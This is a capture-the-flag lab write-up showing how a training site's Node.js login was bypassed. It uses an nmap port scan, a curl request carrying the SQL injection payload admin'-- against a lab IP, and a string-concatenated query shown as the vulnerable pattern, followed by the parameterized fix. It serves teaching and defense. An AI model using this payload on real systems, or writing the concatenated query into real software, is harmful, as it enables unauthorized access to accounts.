SQL Injection Auth Bypass HackerDNA Lab

Auth Bypass via SQL Injection

By Syed Mujtaba Zaidi

Feb 18, 2026

Platform: HackerDNA

Difficulty: Junior

// Challenge Summary

A classic SQL injection authentication bypass on an enterprise login portal running Node.js/Express on a non-standard port discovered via Nmap scanning.

Target63.32.98.247

Service Port8080 (Node.js)

VulnerabilitySQL Injection

Tools Usednmap, curl, gobuster

Methodology

Port Discovery

Main page on port 80 was just a static challenge page. Ran full port scan to find the real service.

Service Enumeration

Discovered port 8080 running Node.js/Express — the actual authentication system.

Login Form Analysis

Port 8080 revealed an enterprise login form POSTing to /login endpoint.

SQL Injection

Tested the username field with classic payloads — authentication bypassed successfully.

Reconnaissance

The challenge page only showed a static landing page on port 80 with no useful attack surface. The hint said to "find the authentication service located on this network" — this meant port scanning was required.

bashnmap scan

nmap -sV -p- --min-rate 5000 63.32.98.247

kali@terminal

PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx 1.26.3
8080/tcp open  http    Node.js (Express middleware)

Port 8080 was the target — a Node.js/Express application running the authentication service.

Enumeration

Visiting http://63.32.98.247:8080/ revealed a standard enterprise login form with username and password fields, submitting credentials via POST to /login.

First I tested default credentials:

bashdefault creds test

curl -X POST http://63.32.98.247:8080/login \
  -d "username=admin&password=admin"

✗ Authentication failed. Invalid username or password.

Default credentials did not work. Moving on to SQL injection testing.

Exploitation

The login form was a prime candidate for SQL injection. The classic payload to bypass authentication is:

sqlinjection payload logic

-- Normal query the app runs:
SELECT * FROM users WHERE username='INPUT' AND password='INPUT'

-- With payload  admin'--  the query becomes:
SELECT * FROM users WHERE username='admin'--' AND password='...'

-- Everything after -- is a comment, password check is ignored!

bashexploit

curl -X POST http://63.32.98.247:8080/login \
  -d "username=admin'--&password=anything"

✓ Authentication Successful! Welcome, admin!

Vulnerability Analysis

⚠ OWASP A03:2021 — SQL Injection

The application directly concatenated user-supplied input into SQL queries without sanitization or parameterization. This is one of the most well-known and dangerous vulnerabilities in web security.

Vulnerable Code Pattern

javascriptvulnerable code (example)

// ❌ VULNERABLE — string concatenation
const query = `SELECT * FROM users WHERE username='${username}' AND password='${password}'`;

Secure Code Pattern

javascriptsecure code

// ✅ SECURE — parameterized query
const query = 'SELECT * FROM users WHERE username=? AND password=?';
db.execute(query, [username, password]);

Key Learnings

🔍

Port Scanning First

Always scan all ports — services often run on non-standard ports like 8080, 8443, 3000.

💉

Test Input Fields

Every login form should be tested for SQL injection before trying other techniques.

🛡️

Use Parameterized Queries

Prepared statements completely prevent SQL injection regardless of input.

🧠

Understand the SQL Logic

Understanding how the query breaks helps craft better payloads and explain fixes.

🔗 Lab Link: http://63.32.98.247/ — HackerDNA Auth Bypass Challenge